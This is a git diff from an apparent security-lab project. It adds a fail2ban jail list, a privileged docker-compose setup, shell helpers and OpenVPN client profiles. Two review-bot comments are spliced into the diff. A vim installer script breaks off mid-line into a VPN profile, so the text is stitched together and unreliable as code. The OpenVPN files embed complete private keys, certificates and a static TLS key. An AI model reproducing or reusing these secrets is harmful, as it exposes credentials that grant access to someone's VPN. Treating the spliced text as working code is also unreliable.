+[proftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(proftpd_log)s 
+backend = %(proftpd_backend)s + + +[pure-ftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(pureftpd_log)s +backend = %(pureftpd_backend)s + + +[gssftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(syslog_daemon)s +backend = %(syslog_backend)s + + +[wuftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(wuftpd_log)s +backend = %(wuftpd_backend)s + + +[vsftpd] +# or overwrite it in jails.local to be +# logpath = %(syslog_authpriv)s +# if you want to rely on PAM failed login attempts +# vsftpd's failregex should match both of those formats +port = ftp,ftp-data,ftps,ftps-data +logpath = %(vsftpd_log)s + + +# +# Mail servers +# + +# ASSP SMTP Proxy Jail +[assp] + +port = smtp,465,submission +logpath = /root/path/to/assp/logs/maillog.txt + + +[courier-smtp] + +port = smtp,465,submission +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[postfix] +# To use another modes set filter parameter "mode" in jail.local: +mode = more +port = smtp,465,submission +logpath = %(postfix_log)s +backend = %(postfix_backend)s + + +[postfix-rbl] + +filter = postfix[mode=rbl] +port = smtp,465,submission +logpath = %(postfix_log)s +backend = %(postfix_backend)s +maxretry = 1 + + +[sendmail-auth] + +port = submission,465,smtp +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[sendmail-reject] +# To use more aggressive modes set filter parameter "mode" in jail.local: +# normal (default), extra or aggressive +# See "tests/files/logs/sendmail-reject" or "filter.d/sendmail-reject.conf" for usage example and details. +#mode = normal +port = smtp,465,submission +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[qmail-rbl] + +filter = qmail +port = smtp,465,submission +logpath = /service/qmail/log/main/current + + +# dovecot defaults to logging to the mail syslog facility +# but can be set by syslog_facility in the dovecot configuration. 
+[dovecot] + +port = pop3,pop3s,imap,imaps,submission,465,sieve +logpath = %(dovecot_log)s +backend = %(dovecot_backend)s + + +[sieve] + +port = smtp,465,submission +logpath = %(dovecot_log)s +backend = %(dovecot_backend)s + + +[solid-pop3d] + +port = pop3,pop3s +logpath = %(solidpop3d_log)s + + +[exim] +# see filter.d/exim.conf for further modes supported from filter: +#mode = normal +port = smtp,465,submission +logpath = %(exim_main_log)s + + +[exim-spam] + +port = smtp,465,submission +logpath = %(exim_main_log)s + + +[kerio] + +port = imap,smtp,imaps,465 +logpath = /opt/kerio/mailserver/store/logs/security.log + + +# +# Mail servers authenticators: might be used for smtp,ftp,imap servers, so +# all relevant ports get banned +# + +[courier-auth] + +port = smtp,465,submission,imap,imaps,pop3,pop3s +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[postfix-sasl] + +filter = postfix[mode=auth] +port = smtp,465,submission,imap,imaps,pop3,pop3s +# You might consider monitoring /var/log/mail.warn instead if you are +# running postfix since it would provide the same log lines at the +# "warn" level but overall at the smaller filesize. +logpath = %(postfix_log)s +backend = %(postfix_backend)s + + +[perdition] + +port = imap,imaps,pop3,pop3s +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[squirrelmail] + +port = smtp,465,submission,imap,imap2,imaps,pop3,pop3s,http,https,socks +logpath = /var/lib/squirrelmail/prefs/squirrelmail_access_log + + +[cyrus-imap] + +port = imap,imaps +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[uwimap-auth] + +port = imap,imaps +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +# +# +# DNS servers +# + + +# !!! WARNING !!! +# Since UDP is connection-less protocol, spoofing of IP and imitation +# of illegal actions is way too simple. Thus enabling of this filter +# might provide an easy way for implementing a DoS against a chosen +# victim. 
See +# http://nion.modprobe.de/blog/archives/690-fail2ban-+-dns-fail.html +# Please DO NOT USE this jail unless you know what you are doing. +# +# IMPORTANT: see filter.d/named-refused for instructions to enable logging +# This jail blocks UDP traffic for DNS requests. +# [named-refused-udp] +# +# filter = named-refused +# port = domain,953 +# protocol = udp +# logpath = /var/log/named/security.log + +# IMPORTANT: see filter.d/named-refused for instructions to enable logging +# This jail blocks TCP traffic for DNS requests. + +[named-refused] + +port = domain,953 +logpath = /var/log/named/security.log + + +[nsd] + +port = 53 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] +logpath = /var/log/nsd.log + + +# +# Miscellaneous +# + +[asterisk] + +port = 5060,5061 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] + %(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"] +logpath = /var/log/asterisk/messages +maxretry = 10 + + +[freeswitch] + +port = 5060,5061 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] + %(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"] +logpath = /var/log/freeswitch.log +maxretry = 10 + + +# To log wrong MySQL access attempts add to /etc/my.cnf in [mysqld] or +# equivalent section: +# log-warning = 2 +# +# for syslog (daemon facility) +# [mysqld_safe] +# syslog +# +# for own logfile +# [mysqld] +# log-error=/var/log/mysqld.log +[mysqld-auth] + +port = 3306 +logpath = 
%(mysql_log)s +backend = %(mysql_backend)s + + +# Log wrong MongoDB auth (for details see filter 'filter.d/mongodb-auth.conf') +[mongodb-auth] +# change port when running with "--shardsvr" or "--configsvr" runtime operation +port = 27017 +logpath = /var/log/mongodb/mongodb.log + + +# Jail for more extended banning of persistent abusers +# !!! WARNINGS !!! +# 1. Make sure that your loglevel specified in fail2ban.conf/.local +# is not at DEBUG level -- which might then cause fail2ban to fall into +# an infinite loop constantly feeding itself with non-informative lines +# 2. Increase dbpurgeage defined in fail2ban.conf to e.g. 648000 (7.5 days) +# to maintain entries for failed logins for sufficient amount of time +[recidive] + +logpath = /var/log/fail2ban.log +banaction = %(banaction_allports)s +bantime = 1w +findtime = 1d + + +# Generic filter for PAM. Has to be used with action which bans all +# ports such as iptables-allports, shorewall + +[pam-generic] +# pam-generic filter can be customized to monitor specific subset of 'tty's +banaction = %(banaction_allports)s +logpath = %(syslog_authpriv)s +backend = %(syslog_backend)s + + +[xinetd-fail] + +banaction = iptables-multiport-log +logpath = %(syslog_daemon)s +backend = %(syslog_backend)s +maxretry = 2 + + +# stunnel - need to set port for this +[stunnel] + +logpath = /var/log/stunnel4/stunnel.log + + +[ejabberd-auth] + +port = 5222 +logpath = /var/log/ejabberd/ejabberd.log + + +[counter-strike] + +logpath = /opt/cstrike/logs/L[0-9]*.log +# Firewall: http://www.cstrike-planet.com/faq/6 +tcpport = 27030,27031,27032,27033,27034,27035,27036,27037,27038,27039 +udpport = 1200,27000,27001,27002,27003,27004,27005,27006,27007,27008,27009,27010,27011,27012,27013,27014,27015 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(tcpport)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(udpport)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] + +# 
consider low maxretry and a long bantime +# nobody except your own Nagios server should ever probe nrpe +[nagios] + +logpath = %(syslog_daemon)s ; nrpe.cfg may define a different log_facility +backend = %(syslog_backend)s +maxretry = 1 + + +[oracleims] +# see "oracleims" filter file for configuration requirement for Oracle IMS v6 and above +logpath = /opt/sun/comms/messaging64/log/mail.log_current +banaction = %(banaction_allports)s + +[directadmin] +logpath = /var/log/directadmin/login.log +port = 2222 + +[portsentry] +logpath = /var/lib/portsentry/portsentry.history +maxretry = 1 + +[pass2allow-ftp] +# this pass2allow example allows FTP traffic after successful HTTP authentication +port = ftp,ftp-data,ftps,ftps-data +# knocking_url variable must be overridden to some secret value in jail.local +knocking_url = /knocking/ +filter = apache-pass[knocking_url="%(knocking_url)s"] +# access log of the website with HTTP auth +logpath = %(apache_access_log)s +blocktype = RETURN +returntype = DROP +action = %(action_)s[blocktype=%(blocktype)s, returntype=%(returntype)s] +bantime = 1h +maxretry = 1 +findtime = 1 + + +[murmur] +# AKA mumble-server +port = 64738 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol=tcp, chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol=udp, chain="%(chain)s", actname=%(banaction)s-udp] +logpath = /var/log/mumble-server/mumble-server.log + + +[screensharingd] +# For Mac OS Screen Sharing Service (VNC) +logpath = /var/log/system.log +logencoding = utf-8 + +[haproxy-http-auth] +# HAProxy by default doesn't log to file you'll need to set it up to forward +# logs to a syslog server which would then write them to disk. +# See "haproxy-http-auth" filter for a brief cautionary note when setting +# maxretry and findtime. 
+logpath = /var/log/haproxy.log
+
+[slapd]
+port = ldap,ldaps
+logpath = /var/log/slapd.log
+
+[domino-smtp]
+port = smtp,ssmtp
+logpath = /home/domino01/data/IBM_TECHNICAL_SUPPORT/console.log
+
+[phpmyadmin-syslog]
+port = http,https
+logpath = %(syslog_authpriv)s
+backend = %(syslog_backend)s
+
+
+[zoneminder]
+# Zoneminder HTTP/HTTPS web interface auth
+# Logs auth failures to apache2 error log
+port = http,https
+logpath = %(apache_error_log)s
+
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100755
index 0000000..95029a4
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,37 @@
+version: "2"
+
+services:
+ registry:
+ image: registry
+ ports:
+ - "5000:5000"
+
+ master:
+ image: localhost:5000/sec
+ privileged: true
+ cap_add:
+ - NET_ADMIN
+ user: root
+ entrypoint: ["sec_bootstrap", "role=master", "sec_master_service_name=master", "sec_worker_service_name=worker"]
+ ports:
+ - "2222:22"
+ networks:
+ - net
+ volumes:
+ - /home/zoiros13/swarmlab-sec/test/project:/project
+
+
+ worker:
+ image: localhost:5000/sec
+ privileged: true
+ cap_add:
+ - NET_ADMIN
+ user: root
+ entrypoint: ["sec_bootstrap", "role=worker", "sec_master_service_name=master", "sec_worker_service_name=worker"]
+ networks:
+ - net
+ volumes:
+ - /home/zoiros13/swarmlab-sec/test/project:/project
+
+networks:
+ net:
diff --git a/get_hosts b/get_hosts
new file mode 100755
index 0000000..e3f6483
--- /dev/null
+++ b/get_hosts
@@ -0,0 +1,8 @@
+#!/bin/sh
+
+# Include the variables that store the Docker service names
+# shellcheck disable=SC1091
+. /etc/opt/service_names
+
+( netstat -t | grep ESTABLISHED | awk '{print $5}' | grep "$MPI_WORKER_SERVICE_NAME" | cut -d: -f1 \
+& getent hosts "$MPI_MASTER_SERVICE_NAME" | cut -d' ' -f1 ) | sort -u
diff --git a/install-vim-plugin.sh b/install-vim-plugin.sh
new file mode 100755
index 0000000..4a3801c
--- /dev/null
+++ b/install-vim-plugin.sh
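Review bot: In workingjail.local, `[DEFAULT]` leaves `action_` commented out while still setting `action = %(action_)s`, and only `[sshd]` defines its own `action_`. `[selinux-ssh]` is also set to `enabled = true` but has no `action_`, so its `action` interpolation has nothing to resolve and fail2ban will most likely refuse that jail at start. Either uncomment the `#action_ = %(banaction)s[...]` line in `[DEFAULT]` and drop the per-jail copy in `[sshd]`, or remove `enabled = true` from `[selinux-ssh]` if it is not needed. A short comment at the top listing which lines differ from the distribution jail.conf would help, since the header still says the file should not be modified.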
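Review bot: In docker-compose.yml both `master` and `worker` set `privileged: true`, which already grants every capability plus host device access, so the `cap_add: NET_ADMIN` entries next to it have no effect. If the lab only needs firewall and capture tooling, drop `privileged: true` and keep `cap_add` (adding `NET_RAW` if required). `"2222:22"` publishes the master's sshd on every host interface; `"127.0.0.1:2222:22"` keeps it local to the host. The bind-mount source `/home/zoiros13/swarmlab-sec/test/project` is an absolute path from one machine, and `image: registry` is untagged.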
@@ -0,0 +1,74 @@ +#! /usr/bin/env sh + +start_dir=$(pwd) +bin_string="export PATH=\"${PATH}:${HOME}/.vimpkg/bin\"" + +# Download the apt-vim files +curl -fSsLo ${HOME}/apt-vim/apt-vim --create-dirs \ + https://raw.githubusercontent.com/egalpin/apt-vim/master/apt-vim + +curl -fSsLo ${HOME}/apt-vim/vim_config.json \ + https://raw.githubusercontent.com/egalpin/apt-vim/master/vim_config.json + +# Add vimrc if there isn't one already +[ -f ${HOME}/.vimrc ] || touch ${HOME}/.vimrc + +# Make sure vimrc is using pathogen +if [ $(grep -c "execute pathogen#infect()" ${HOME}/.vimrc) -eq 0 ]; then + echo "execute pathogen#infect()" >> ${HOME}/.vimrc +fi +if [ $(grep -c "call pathogen#helptags()" ${HOME}/.vimrc) -eq 0 ]; then + echo "call pathogen#helptags()" >> ${HOME}/.vimrc +fi + +# Update path for executing shell +eval "$bin_string" + +added_to_profile=false +already_present=false +for rc in bashrc zshrc bash_profile; do + if [ -s "$HOME/.$rc" ]; then + if grep -q "$bin_string" "$HOME/.$rc"; then + already_present=true + else + printf "\n$bin_string\n" >> "$HOME/.$rc" + printf "== Added apt-vim PATH to '~/.$rc'\n" + added_to_profile=true + fi + fi +done + +# Execute apt-vim init +cd ${HOME}/apt-vim +python - < +-----BEGIN PRIVATE KEY----- +MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDeVYe+ZqJVT8yz +U/weebbn8MIZmfyAuN1BCwsxt1PR9Bnr+BYMRnxP2g+ZHcQhEngjBAuBIgBjLqV+ +B6qceDz3vVmHjzvNZDzx6laQDKxfjbcTX/RlFqDSAtwzgBRENjsUzcdKq42l/Upu +9wh2CPrVGfB876sYTy76xEP2LYKfmqK1FMOHQRWjjgviY954Beyo2BnUsygxq9rE +UExmDoiyT9xEiexJbD/GIuuRJMxIJbgBK6/eGJRmyUXO5uKt8vLqOktiox34NVSx +8ZC5jkUB0LIxp/E2gALU7D+M4UYfFhjDmZosLN2+LIaXwXplwrcwgBeQsRvwsnX7 +J0glL6sPAgMBAAECggEAfTXV2JicW0cxlNx7Y/5Pz5d6+EgMN8HkeLjrePgxsE+0 +OXvhjtAzOhUoK6bjyWxJVA73G6Y2aaTfdnaC0tO0IiD0xq8XkrgcynCah01b1gRN +Ug/75uIzd5I8yJQc1b1k0HaDAb5Ta2OWA6ADl9W+zTxqfzHKPUp6vqbBT2aZ5Z93 +wwK3lsvqadiR3luvHpPbE9+rbZlckgAaChonm2818ZlMk+bRw8S5HVweDqJ9GQ7V +N80vddLFpkgHWKcwVerl1F28WknArPuzGE8j2DdMKGrjOSPsD6DmTwCcfMkX86yD 
+ijdZ8V3nE34o3B656PRavaLEMze6lOUYdlIvwaYXIQKBgQDu0oOlVIdPu8bCIab0 +SLhGbVBpsGsxvQIPpNtjALi2ZL/7MXcV4M96exMbE1OZR7Px5bvncXmKzfF7DZ0I +ow9+p7sU8OyrjFPYqyIZO/avXDxUPjSwB9hr/YmrT+wruE9wxOiovJoU51d9jSic +0PeXkWzTa9ExviAuFg7zu+AvWwKBgQDuU2o6ytpkdDOFoh/z9oRgyh5Yrob7yYB0 +IMl+SlkO3Sx0eTvOCh/ixXZyKxQtO+bXLfstXcMqKXbXQ12ZXK9hEMgQrvxtGmt8 +YyEQEB4dpzIDwL0odwGNPgw9v5F+ozp3yJGsfED2YuDvcevO2dypBuKlEfQLg7oO +qWXclVQVXQKBgERTmjJs8qGPOZhFBH0TaRVNJRp3zNNYHgTXx6SVikM0o/B8AHQT +84g5OggfCWXrK8JjVdUrk/hwX0wzYuAbts0ns9CT9UJHTZ3JqGHL1BHrs57uhShv +ti1/RinrHciMXL4It/++pd6hKVjUT/A9oPiONLJwQFOY75//05tL/yHNAoGBAIIT +AuKtvn6fMVOZRelIPb358pAiSUf5FWPMVUzZVTwYmN/FH0/4FKkXbusm+e8qR3Zg +ATwkdZV4ZgVdHiPLA2lt2FPKvbjqd4m/LNdwhI9YpqKHunXwZedp2xKEkOtWOV4R +GPjUJDyVgQEO403VeGrEeETxxInYTl8cM50t32N9AoGAXyodFR2SU2LeH01dmkyo +8rWOBrxle6tbQwvg5/M15lNKSJSPrMj/HwF8TGm9sky7nTf8MG34XoT4HAep0SQt +r9gGOZYVaFOAQjaO5MGoTEqQsgRKQd4/qjnw34A1EtW+max9E/6Q+pRAZmMsTQcw +N64WPlO37tcqFVex8Rf3TL8= +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDVzCCAj+gAwIBAgIQUkSzUMmqqaSl/9+zl26XQjANBgkqhkiG9w0BAQsFADAW +MRQwEgYDVQQDDAtFYXN5LVJTQSBDQTAeFw0yMTAxMjMwNDUxNTlaFw0yNDAxMDgw +NDUxNTlaMBQxEjAQBgNVBAMMCXNlY192cG5fMTCCASIwDQYJKoZIhvcNAQEBBQAD +ggEPADCCAQoCggEBAN5Vh75molVPzLNT/B55tufwwhmZ/IC43UELCzG3U9H0Gev4 +FgxGfE/aD5kdxCESeCMEC4EiAGMupX4Hqpx4PPe9WYePO81kPPHqVpAMrF+NtxNf +9GUWoNIC3DOAFEQ2OxTNx0qrjaX9Sm73CHYI+tUZ8HzvqxhPLvrEQ/Ytgp+aorUU +w4dBFaOOC+Jj3ngF7KjYGdSzKDGr2sRQTGYOiLJP3ESJ7ElsP8Yi65EkzEgluAEr +r94YlGbJRc7m4q3y8uo6S2KjHfg1VLHxkLmORQHQsjGn8TaAAtTsP4zhRh8WGMOZ +miws3b4shpfBemXCtzCAF5CxG/CydfsnSCUvqw8CAwEAAaOBojCBnzAJBgNVHRME +AjAAMB0GA1UdDgQWBBSb9gH1T/P27JBhjN0Cpuho915rizBRBgNVHSMESjBIgBQq +XIIQau9BBn3TLBYCAYgU3eSBrqEapBgwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0GC +FFFs/LbCAXkoa6MEwNisGWwg8TH+MBMGA1UdJQQMMAoGCCsGAQUFBwMCMAsGA1Ud +DwQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAQEAVK++P8GkkGngnKMZElSHhTYxKXsk +VIsExPbyJ1Cv7u/bOjlpE3stlha4i5C6q2ftIVdjZwl1eWH64Z77tSduVeEakHka +raoUD7ZhnuYAQ2vv7byFFHyQ/ADvrXX/0wrUGTwBhOXwyjl0voBv67tQ4okcsc9C 
+c20gPRwwian/0tj3C8agFtKzQ7RpyGkSZq1D6wQmmPgGUeSqMN2elHQQ5KVtlSll +ruGkWDWaI9330GYzbxIe3rTv8FhEElR3Tno6KsY4RpvZ4BvUktdFBoo+DGIom04B +WgGDwNszLVOTg0kkv61MUTZxGkgkOK3sF1Ggq6outeVI6iTl9k91z/3/CA== +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq +hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 
+87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_2.ovpn b/project/sec_vpn_2.ovpn new file mode 100644 index 0000000..9c1901e --- /dev/null +++ b/project/sec_vpn_2.ovpn 
@@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQC3HvMHw/05jiJc +/VY3uoigTUmlkvYKDk3G18CJ/p0zOdOAsYGEUgFBn4OV2QCDkam+uwICgNS6KgjS +l8SQ3+ULaqmMki1lWIi9o7aRxp7ioJ0UNOdVJo64G/rVloDUNCt+xeHleo7R6hFD +hqP4d4KIIPRHLFhU+IJ+tLaX5lRUMn2kZ4ezP5ERqSt0LsSZxKO4IswwAeuguvUx +tJgyu0YFV/Sq1/R/QpvWeEZO0/P+WnDL8xMo9WpRxRnWrVBlxJuhT976/Emdtjml +hDCgr478xtOyML+N7pbgDpbkJ92sTkO/ILEaY34CbuBtxHCtqFyDJ5QY37d8e9SZ +5ls2dM7fAgMBAAECggEAEuzC5xmNMQaMbJnN8EJ53j8+jjsK7G0gAp3HiztiGaov +PoyZuwgSkyqeGb1sfSxvo4OGKKYR1g+EC+eda++Hp09lqF5vDJtCvn6N3rDtOLSq +pyz0f2tVspdJrAs60zN1D0v6FZI98lnDYPwoNAR92/2z4SsnEdkA+4FHoZkvO+gz +KycoLfUZH1UMLKTFMmSX3dSxYzp7kPEZP2VBlyH1KA6/JE1G/fiyOdoYixgMcnCB +hZc0gPgJjRtwoQ8JXDz74uezGqm737tY+IA1DUoW4Ojcie3VAsPoZb300VecKuai +GT5KXMHgvnSUnSlJouGTebUvcDxlMzPhiO6CoN5gUQKBgQDcp3LQ3yJFnXTMqXmW +n7veHNcXUGQmo0H496L3c3XGcQt/smjOI/R+I3QQ1fogWBWaxvTSWjAZntMCJXD6 +Tu/idtZnGF3Bxg8InpmAB9mljU0FhLkpdTCbXg+HGjkZ8NEj2/kndSGB8r49Px/6 +NUJudE9VZkdiwaADaW8RAUuftwKBgQDUdFhCXwvUVsER4uZlwlRH4JgzHnClwO8r +dF7scKunMKtIStqYkfi5jc/YS4J+s2yP8KF+04NDk/PNqqvvdaak1dMVwAp/K1Pc +LZ1CqgcnuaTDhtflS/+EO7fUqazwxGqanom2NOC2sOHsGkYD8Ehb7GyhhW8KPzie +eP85mbN6GQKBgA6jnV52L1PnCmS5qbNwjYpC55JIZxyZIDtgUpOQOXQc8+JY99MV +V5c2yvCDAcE7ltNZ98ws55wLiXxO95vjuM6Ri8/zMeU1OrIbs5tm6e2t3jpLf+1c +NQlZyDXya29pJrb2VSVlBAAXFsABfCGhfvLNDKZhzsKijfcr+45pQ5cpAoGATXEv +btoYhMkuzWdJFpS0hhLPR+rzoufmBo//ve4AFAyAkvR+JBkpcfHIbo5vveGHVByh +sYpGEc8PksuAquPW38T1kbsT2HEhu2OBLHiv7QIVlhREBFgkhr4B72n+GTFvrnbV +ue4ib1WgtKCLHwpqRd+zZVkvNav/5nwyhHuLWZkCgYBky0RyDSzpm/DSZP3BvB2m +XtMat68OP6SK0SU0QT4deOM5EkOvhnkKjViRZ8f1PimDZufRz7rfEwfhEjZxrSYj +Mb7ZXFaDnzBJsxCnjq7f032SnAYD854gcdf+VrVxYfSBazcN8p8Wb0N4p8yOaVI0 +iba/pI9zOZ1usvZsyy+pJQ== +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDVzCCAj+gAwIBAgIQGtgb8vOBzm9VXxqyeUeSnTANBgkqhkiG9w0BAQsFADAW 
+MRQwEgYDVQQDDAtFYXN5LVJTQSBDQTAeFw0yMTAxMjMwNDUyMDZaFw0yNDAxMDgw +NDUyMDZaMBQxEjAQBgNVBAMMCXNlY192cG5fMjCCASIwDQYJKoZIhvcNAQEBBQAD +ggEPADCCAQoCggEBALce8wfD/TmOIlz9Vje6iKBNSaWS9goOTcbXwIn+nTM504Cx +gYRSAUGfg5XZAIORqb67AgKA1LoqCNKXxJDf5QtqqYySLWVYiL2jtpHGnuKgnRQ0 +51Umjrgb+tWWgNQ0K37F4eV6jtHqEUOGo/h3gogg9EcsWFT4gn60tpfmVFQyfaRn +h7M/kRGpK3QuxJnEo7gizDAB66C69TG0mDK7RgVX9KrX9H9Cm9Z4Rk7T8/5acMvz +Eyj1alHFGdatUGXEm6FP3vr8SZ22OaWEMKCvjvzG07Iwv43uluAOluQn3axOQ78g +sRpjfgJu4G3EcK2oXIMnlBjft3x71JnmWzZ0zt8CAwEAAaOBojCBnzAJBgNVHRME +AjAAMB0GA1UdDgQWBBSO/gU91bILWZYpApQoHgewvPHJ+jBRBgNVHSMESjBIgBQq +XIIQau9BBn3TLBYCAYgU3eSBrqEapBgwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0GC +FFFs/LbCAXkoa6MEwNisGWwg8TH+MBMGA1UdJQQMMAoGCCsGAQUFBwMCMAsGA1Ud +DwQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAQEAG5b3okfbW6ay+cM175cK9lgcruh/ +P1ddn3ENVgPDU0174qfNYvtKNtWuF/I09oIQLfHHvS6THmoYo6XbTuTRBANXLixu +w0fyEcbYrhZ8S3esaH6CgZv/nhMH+QWnvpkliQ9HfR4FuDn3rX6OZvSjqouNiLJI +Q0PTsf2h9MDkcC/wV1cEwGbLk9iKM/p0S1Ri4s9qgggeueIWyIcQq3t2y7vomsat +k1fCKyliFhHkwPhnsjNMTcAc9Us0QxeULq5Bu/fQ77/oS3K6VcU7GAqv5GxP/Usc +GMKwaBnhsjZNLtVdNG8kVLRHLvPcg5TYPmEfNzzC3I8AI5c6MH2LmY8hYg== +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq 
